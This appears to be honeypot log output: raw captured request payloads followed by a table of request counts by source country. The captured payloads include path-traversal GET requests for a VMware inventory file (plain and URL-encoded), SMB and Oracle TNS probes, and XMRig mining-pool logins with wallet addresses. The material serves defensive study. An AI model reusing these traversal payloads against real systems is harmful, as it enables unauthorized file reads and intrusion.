1024 | 1 | \x01\x00\x00\xFD\xCE\xFA\x0B\xB0\xA0\x00\x00\x00MMS\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x01\x00\x03\x00\xF0\xF0\xF0\xF0\x0B\x00\x04\x00\x1C\x00\x03\x00N\x00S\x00P\x00l\x00a\x00y\x00e\x00r\x00/\x009\x00.\x000\x00.\x000\x00.\x002\x009\x008\x000\x00;\x00 \x00{\x000\x000\x000\x000\x00A\x00A\x000\x000\x00-\x000\x00A\x000\x000\x00-\x000\x000\x00a\x000\x00-\x00A\x00A\x000\x00A\x00-\x000\x000\x000\x000\x00A\x000\x00A\x00A\x000\x00A\x00A\x000\x00}\x00\x00\x00\xE0m\xDF_ |
1025 | 1 | \x00Z\x00\x00\x01\x00\x00\x00\x016\x01,\x00\x00\x08\x00\x7F\xFF\x7F\x08\x00\x00\x00\x01\x00 \x00:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x004\xE6\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00(CONNECT_DATA=(COMMAND=version)) |
1026 | 1 | \x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x0F\x00 |
1028 | 1 | GET /sdk/../../../../../..//etc/vmware/hostd/vmInventory.xml HTTP/1.1 |
1029 | 1 | GET /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E//etc/vmware/hostd/vmInventory.xml HTTP/1.1 |
1030 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xE0’W\x87F\x87\xA63\x05\x02\x00\x01\x00\x00\xA1\xAA |
1037 | 1 | \x00\x00\x00\xA4\xFFSMBr\x00\x00\x00\x00\x08\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x06\x00\x00\x01\x00\x00\x81\x00\x02PC NETWORK PROGRAM 1.0\x00\x02MICROSOFT NETWORKS 1.03\x00\x02MICROSOFT NETWORKS 3.0\x00\x02LANMAN1.0\x00\x02LM1.2X002\x00\x02Samba\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00 |
1038 | 1 | \x01default |
1039 | 1 | 0\x0C\x02\x01\x01`\x07\x02\x01\x02\x04\x00\x80\x00 |
1041 | 1 | TNMP\x04\x00\x00\x00TNME\x00\x00\x04\x00 |
1042 | 1 | \x03\x00\x00\x0B\x06\xE0\x00\x00\x00\x00\x00 |
1043 | 1 | DmdT\x00\x00\x00\x17\x00\x00\x00\x01\x00\x00\x00\x00\x11\x11\x00\xFF\x01\xFF\x13 |
1044 | 1 | :\x00\x00\x00/\x00\x00\x00\x02\x00\x00@\x02\x0F\x00\x01\x00=\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x1F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
1052 | 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220xd31674af0bc31fdc779c3a2d74fe7ab4f9171edf\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |
1053 | 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22431y9DykAGzegFf9P3ubbeDGbTeRwoUeKe2WzrSsd81aRcQ84Q5wkhQEmUZXALUMxFe9bvBH4RUsCcZvZKNYvYQG7fMxyrw\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
1057 | 1 | \x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x04\x08\xA8\xC0\xD8C\xAEC\x95x/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xBC:\xAD\xF5\x05\xAF\x91\x91\xAB@mg\xBA\xD0\xF9F\xC3PN\xF9\x8D\xF3tAb\x9Ds<\x87w\x19\x96E{b\xF0\x82\xF8c9\x93\xC7R\xDB0\xFE\x9D\x9F\xB0\xF99r\xD8OO\x1Ae\xF4\xBF\xA6\xE2\xA4\xFBP\x8E\xD8\xF4$\x1A\xAE\x04\xB2\x05\x89\xD6\x9A\xCB)\x1A_\xCE\xE2K{\x8C |
1063 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4K\x93\x0EU\x82l\xDD\xF7\x05\x02\x00\x01\x00\x00\xA1\xAA |
1066 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB41[\x0F\xC0\xDB\xAD\xAD\xAA\x05\x02\x00\x01\x00\x00\xA1\xAA |
1075 | 1 | \x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x13\x01\xA8\xC0\xF0 \xFF$E\xFF/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xB6h\xA1\xD0MR\xCB\xF5 |
1076 | 1 | GET /odinhttpcall1742990704 HTTP/1.1 |
1077 | 1 | GET /OdinHttpCall1742990704 HTTP/1.1 |
1078 | 1 | GET /Odin/http/call1742990704 HTTP/1.1 |
1151 | 1 | GET /r3Jm HTTP/1.1 |
1152 | 1 | GET /oDBh HTTP/1.1 |
1163 | 1 | GET /odinhttpcall1742979336 HTTP/1.1 |
1164 | 1 | GET /OdinHttpCall1742979336 HTTP/1.1 |
1165 | 1 | GET /Odin/http/call1742979336 HTTP/1.1 |
country_iso_code#
number of requests by source country (ip / country equivalence that request the honeypot) n
number_of_occurence | country_iso_code | |
---|---|---|
0 | 1627 | US |
1 | 828 | BG |
2 | 672 | FR |
3 | 529 | NL |
4 | 200 | CN |
5 | 151 | DE |
6 | 142 | GB |
7 | 131 | PL |
8 | 80 | HK |
9 | 61 | SG |
10 | 56 | JP |
11 | 55 | IN |
12 | 42 | RU |
13 | 39 | PT |
14 | 37 | ES |
15 | 36 | CH |
16 | 31 | SC |
17 | 26 | CA |
18 | 22 | NG |
19 | 15 | HR |
20 | 12 | LT |
21 | 12 | NO |
22 | 12 | BE |
23 | 12 | VE |
24 | 11 | UA |
25 | 8 | MD |
26 | 8 | KR |
27 | 7 | GH |
28 | 7 | AZ |
29 | 6 | HU |
30 | 6 | TR |
31 | 6 | IE |
32 | 5 | ZA |
33 | 5 | SA |
34 | 5 | IR |
35 | 4 | IL |
36 | 3 | VN |
37 | 3 | AR |
38 | 3 | IT |
39 | 2 | GR |
40 | 2 | AE |
41 | 2 | BR |
42 | 2 | ID |
43 | 2 | MC |
44 | 1 | CG |
45 | 1 | EC |
46 | 1 | CL |
47 | 1 | EE |
48 | 1 | MX |
49 | 1 | AT |
50 | 1 | PK |
51 | 1 | TH |
52 | 1 | PR |
53 | 1 | AL |